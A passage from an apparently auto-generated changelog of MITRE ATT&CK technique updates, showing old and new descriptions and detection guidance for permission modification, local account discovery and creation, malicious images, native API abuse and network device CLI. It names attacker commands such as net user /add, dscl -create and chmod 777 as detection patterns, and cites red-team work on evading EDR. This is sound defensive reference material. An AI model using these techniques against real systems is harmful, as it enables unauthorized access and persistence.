>/code> (short for change mode).  Adversarial may use these c>/code> (short for change mode).  Adversarial may use these c
>ommands to make themselves the owner of files and directorie>ommands to make themselves the owner of files and directorie
>s or change the mode if current permissions allow it. They c>s or change the mode if current permissions allow it. They c
>ould subsequently lock others out of the file. Specific file>ould subsequently lock others out of the file. Specific file
> and directory modifications may be a required step for many> and directory modifications may be a required step for many
> techniques, such as establishing Persistence via [Unix Shel> techniques, such as establishing Persistence via [Unix Shel
>l Configuration Modification](https://attack.mitre.org/techn>l Configuration Modification](https://attack.mitre.org/techn
>iques/T1546/004) or tainting/hijacking other instrumental bi>iques/T1546/004) or tainting/hijacking other instrumental bi
>nary/configuration files via [Hijack Execution Flow](https:/>nary/configuration files via [Hijack Execution Flow](https:/
>/attack.mitre.org/techniques/T1574).>/attack.mitre.org/techniques/T1574).(Citation: 20 macOS Comm
 >on Tools and Techniques) 

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-29 23:12:40.041000+00:002021-09-13 21:08:09.985000+00:00
descriptionAdversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode). Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques)
x_mitre_detectionMonitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': '20 macOS Common Tools and Techniques', 'description': 'Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.', 'url': 'https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/'}

[T1087.001] Account Discovery: Local Account

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may attempt to get a listing of local system acct1Adversaries may attempt to get a listing of local system acc
>ounts. This information can help adversaries determine which>ounts. This information can help adversaries determine which
> local accounts exist on a system to aid in follow-on behavi> local accounts exist on a system to aid in follow-on behavi
>or.  Commands such as <code>net user</code> and <code>net lo>or.  Commands such as <code>net user</code> and <code>net lo
>calgroup</code> of the [Net](https://attack.mitre.org/softwa>calgroup</code> of the [Net](https://attack.mitre.org/softwa
>re/S0039) utility and <code>id</code> and <code>groups</code>re/S0039) utility and <code>id</code> and <code>groups</code
>>on macOS and Linux can list local users and groups. On Linu>>on macOS and Linux can list local users and groups. On Linu
>x, local users can also be enumerated through the use of the>x, local users can also be enumerated through the use of the
> <code>/etc/passwd</code> file.> <code>/etc/passwd</code> file. On macOS the <code>dscl . li
 >st /Users</code> command can be used to enumerate local acco
 >unts.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:39:08.728000+00:002021-07-28 18:05:24.567000+00:00
descriptionAdversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file.Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.
x_mitre_version1.11.2

[T1136.001] Create Account: Local Account

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may create a local account to maintain access tot1Adversaries may create a local account to maintain access to
> victim systems. Local accounts are those configured by an o> victim systems. Local accounts are those configured by an o
>rganization for use by users, remote support, services, or f>rganization for use by users, remote support, services, or f
>or administration on a single system or service. With a suff>or administration on a single system or service. With a suff
>icient level of access, the <code>net user /add</code> comma>icient level of access, the <code>net user /add</code> comma
>nd can be used to create a local account.  Such accounts may>nd can be used to create a local account. On macOS systems t
> be used to establish secondary credentialed access that do >he <code>dscl -create</code> command can be used to create a
>not require persistent remote access tools to be deployed on> local account.  Such accounts may be used to establish seco
> the system.>ndary credentialed access that do not require persistent rem
 >ote access tools to be deployed on the system.

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 18:04:20.780000+00:002021-08-12 13:04:14.248000+00:00
descriptionAdversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
x_mitre_detectionMonitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.
x_mitre_version1.01.1

[T1078.003] Valid Accounts: Local Accounts

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-05 12:51:00.663000+00:002021-10-18 17:45:48.323000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesLogon Session: Logon Session Metadata

[T1127.001] Trusted Developer Utilities Proxy Execution: MSBuild

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-03-05 22:25:48.777000+00:002021-10-15 23:57:07.973000+00:00
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributors@ionstorm

[T1204.002] User Execution: Malicious File

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-11 14:55:56.177000+00:002021-07-21 23:10:47.193000+00:00
x_mitre_version1.01.1

[T1204.003] User Execution: Malicious Image

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may rely on a user running a malicious image to t1Adversaries may rely on a user running a malicious image to 
>facilitate execution. Amazon Web Services (AWS) Amazon Machi>facilitate execution. Amazon Web Services (AWS) Amazon Machi
>ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az>ne Images (AMIs), Google Cloud Platform (GCP) Images, and Az
>ure Images as well as popular container runtimes such as Doc>ure Images as well as popular container runtimes such as Doc
>ker can be backdoored. Backdoored images may be uploaded to >ker can be backdoored. Backdoored images may be uploaded to 
>a public repository via [Upload Malware](https://attack.mitr>a public repository via [Upload Malware](https://attack.mitr
>e.org/techniques/T1608/001), and users may then download and>e.org/techniques/T1608/001), and users may then download and
> deploy an instance or container from the image without real> deploy an instance or container from the image without real
>izing the image is malicious, thus bypassing techniques that>izing the image is malicious, thus bypassing techniques that
> specifically achieve Initial Access. This can lead to the e> specifically achieve Initial Access. This can lead to the e
>xecution of malicious code, such as code that executes crypt>xecution of malicious code, such as code that executes crypt
>ocurrency mining, in the instance or container.(Citation: Su>ocurrency mining, in the instance or container.(Citation: Su
>mmit Route Malicious AMIs)  Adversaries may also name images>mmit Route Malicious AMIs)  Adversaries may also name images
> a certain way to increase the chance of users mistakenly de> a certain way to increase the chance of users mistakenly de
>ploying an instance or container from the image (ex: [Match >ploying an instance or container from the image (ex: [Match 
>Legitimate Name or Location](https://attack.mitre.org/techni>Legitimate Name or Location](https://attack.mitre.org/techni
>ques/T1036/005)).>ques/T1036/005)).(Citation: Aqua Security Cloud Native Threa
 >t Report June 2021)

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-12 17:54:08.797000+00:002021-08-26 16:42:35.318000+00:00
descriptionAdversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs) Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs) Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Aqua Security Cloud Native Threat Report June 2021', 'description': 'Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. Retrieved August 26, 2021.', 'url': 'https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation'}

[T1587.001] Develop Capabilities: Malware

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:08:33.165000+00:002021-10-17 16:05:41.186000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
x_mitre_version1.11.2

[T1588.001] Obtain Capabilities: Malware

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_data_sources['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content']
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:14:41.582000+00:002021-10-17 16:15:52.805000+00:00
x_mitre_detectionMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEyeSupplyChain', 'description': 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.', 'url': 'https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop'}

[T1036.004] Masquerading: Masquerade Task or Service

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-24 13:24:45.580000+00:002021-10-18 13:24:52.618000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsmacOS

[T1218.005] Signed Binary Proxy Execution: Mshta

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-12-30 14:29:06.462000+00:002021-10-15 23:59:00.395000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributors@ionstorm

[T1106] Native API

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1Adversaries may directly interact with the native OS applicat1Adversaries may interact with the native OS application prog
>tion programming interface (API) to execute behaviors. Nativ>ramming interface (API) to execute behaviors. Native APIs pr
>e APIs provide a controlled means of calling low-level OS se>ovide a controlled means of calling low-level OS services wi
>rvices within the kernel, such as those involving hardware/d>thin the kernel, such as those involving hardware/devices, m
>evices, memory, and processes.(Citation: NT API Windows)(Cit>emory, and processes.(Citation: NT API Windows)(Citation: Li
>ation: Linux Kernel API) These native APIs are leveraged by >nux Kernel API) These native APIs are leveraged by the OS du
>the OS during system boot (when other system components are >ring system boot (when other system components are not yet i
>not yet initialized) as well as carrying out tasks and reque>nitialized) as well as carrying out tasks and requests durin
>sts during routine operations.  Functionality provided by na>g routine operations.  Native API functions (such as <code>N
>tive APIs are often also exposed to user-mode applications v>tCreateProcess</code>) may be directed invoked via system ca
>ia interfaces and libraries. For example, functions such as >lls / syscalls, but these features are also often exposed to
>the Windows API <code>CreateProcess()</code> or GNU <code>fo> user-mode applications via interfaces and libraries. (Citat
>rk()</code> will allow programs and scripts to start other p>ion: OutFlank System Calls)(Citation: CyberBit System Calls)
>rocesses.(Citation: Microsoft CreateProcess)(Citation: GNU F>(Citation: MDSec System Calls) For example, functions such a
>ork) This may allow API callers to execute a binary, run a C>s the Windows API <code>CreateProcess()</code> or GNU <code>
>LI command, load modules, etc. as thousands of similar API f>fork()</code> will allow programs and scripts to start other
>unctions exist for various system operations.(Citation: Micr> processes.(Citation: Microsoft CreateProcess)(Citation: GNU
>osoft Win32)(Citation: LIBC)(Citation: GLIBC)  Higher level > Fork) This may allow API callers to execute a binary, run a
>software frameworks, such as Microsoft .NET and macOS Cocoa,> CLI command, load modules, etc. as thousands of similar API
> are also available to interact with native APIs. These fram> functions exist for various system operations.(Citation: Mi
>eworks typically provide language wrappers/abstractions to A>crosoft Win32)(Citation: LIBC)(Citation: GLIBC)  Higher leve
>PI functionalities and are designed for ease-of-use/portabil>l software frameworks, such as Microsoft .NET and macOS Coco
>ity of code.(Citation: Microsoft NET)(Citation: Apple Core S>a, are also available to interact with native APIs. These fr
>ervices)(Citation: MACOS Cocoa)(Citation: macOS Foundation) >ameworks typically provide language wrappers/abstractions to
> Adversaries may abuse these native API functions as a means> API functionalities and are designed for ease-of-use/portab
> of executing behaviors. Similar to [Command and Scripting I>ility of code.(Citation: Microsoft NET)(Citation: Apple Core
>nterpreter](https://attack.mitre.org/techniques/T1059), the > Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation
>native API and its hierarchy of interfaces, provide mechanis>)  Adversaries may abuse these OS API functions as a means o
>ms to interact with and utilize various components of a vict>f executing behaviors. Similar to [Command and Scripting Int
>imized system.>erpreter](https://attack.mitre.org/techniques/T1059), the na
 >tive API and its hierarchy of interfaces provide mechanisms 
 >to interact with and utilize various components of a victimi
 >zed system. While invoking API functions, adversaries may al
 >so attempt to bypass defensive tools (ex: unhooking monitore
 >d functions via [Disable or Modify Tools](https://attack.mit
 >re.org/techniques/T1562/001)).

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2020-07-01 16:19:54.646000+00:002021-10-18 21:24:30.764000+00:00
descriptionAdversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system. While invoking API functions, adversaries may also attempt to bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)).
external_references[3]['source_name']Microsoft CreateProcessOutFlank System Calls
external_references[3]['description']Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.
external_references[3]['url']http://msdn.microsoft.com/en-us/library/ms682425https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
external_references[4]['source_name']GNU ForkCyberBit System Calls
external_references[4]['description']Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.
external_references[4]['url']https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.htmlhttps://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/
external_references[5]['source_name']Microsoft Win32MDSec System Calls
external_references[5]['description']Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.
external_references[5]['url']https://docs.microsoft.com/en-us/windows/win32/api/https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
external_references[6]['source_name']LIBCMicrosoft CreateProcess
external_references[6]['description']Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.
external_references[6]['url']https://man7.org/linux/man-pages//man7/libc.7.htmlhttp://msdn.microsoft.com/en-us/library/ms682425
external_references[7]['source_name']GLIBCGNU Fork
external_references[7]['description']glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.
external_references[7]['url']https://www.gnu.org/software/libc/https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html
external_references[8]['source_name']Microsoft NETMicrosoft Win32
external_references[8]['description']Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.
external_references[8]['url']https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-frameworkhttps://docs.microsoft.com/en-us/windows/win32/api/
external_references[9]['source_name']Apple Core ServicesLIBC
external_references[9]['description']Apple. (n.d.). Core Services. Retrieved June 25, 2020.Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.
external_references[9]['url']https://developer.apple.com/documentation/coreserviceshttps://man7.org/linux/man-pages//man7/libc.7.html
external_references[10]['source_name']MACOS CocoaGLIBC
external_references[10]['description']Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.
external_references[10]['url']https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1https://www.gnu.org/software/libc/
external_references[11]['source_name']macOS FoundationMicrosoft NET
external_references[11]['description']Apple. (n.d.). Foundation. Retrieved July 1, 2020.Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.
external_references[11]['url']https://developer.apple.com/documentation/foundationhttps://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework
x_mitre_detectionMonitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity.
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Apple Core Services', 'description': 'Apple. (n.d.). Core Services. Retrieved June 25, 2020.', 'url': 'https://developer.apple.com/documentation/coreservices'}
external_references{'source_name': 'MACOS Cocoa', 'description': 'Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.', 'url': 'https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1'}
external_references{'source_name': 'macOS Foundation', 'description': 'Apple. (n.d.). Foundation. Retrieved July 1, 2020.', 'url': 'https://developer.apple.com/documentation/foundation'}
x_mitre_contributorsGordon Long, Box, Inc., @ethicalhax

[T1059.008] Command and Scripting Interpreter: Network Device CLI

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may abuse scripting or built-in command line intt1Adversaries may abuse scripting or built-in command line int
>erpreters (CLI) on network devices to execute malicious comm>erpreters (CLI) on network devices to execute malicious comm
>and and payloads. The CLI is the primary means through which>and and payloads. The CLI is the primary means through which
> users and administrators interact with the device in order > users and administrators interact with the device in order 
>to view system information, modify device operations, or per>to view system information, modify device operations, or per
>form diagnostic and administrative functions. CLIs typically>form diagnostic and administrative functions. CLIs typically
> contain various permission levels required for different co> contain various permission levels required for different co
>mmands.   Scripting interpreters automate tasks and extend f>mmands.   Scripting interpreters automate tasks and extend f
>unctionality beyond the command set included in the network >unctionality beyond the command set included in the network 
>OS. The CLI and scripting interpreter are accessible through>OS. The CLI and scripting interpreter are accessible through
> a direct console connection, or through remote means, such > a direct console connection, or through remote means, such 
>as telnet or secure shell (SSH).  Adversaries can use the ne>as telnet or [SSH](https://attack.mitre.org/techniques/T1021
>twork CLI to change how network devices behave and operate. >/004).  Adversaries can use the network CLI to change how ne
>The CLI may be used to manipulate traffic flows to intercept>twork devices behave and operate. The CLI may be used to man
> or manipulate data, modify startup configuration parameters>ipulate traffic flows to intercept or manipulate data, modif
> to load malicious system software, or to disable security f>y startup configuration parameters to load malicious system 
>eatures or logging to avoid detection. (Citation: Cisco Synf>software, or to disable security features or logging to avoi
>ul Knock Evolution)>d detection. (Citation: Cisco Synful Knock Evolution)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportTrue
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 16:43:38.388000+00:002021-07-26 15:57:50.800000+00:00
descriptionAdversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or secure shell (SSH). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution)
x_mitre_version1.01.1

[T1135] Network Share Discovery

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description
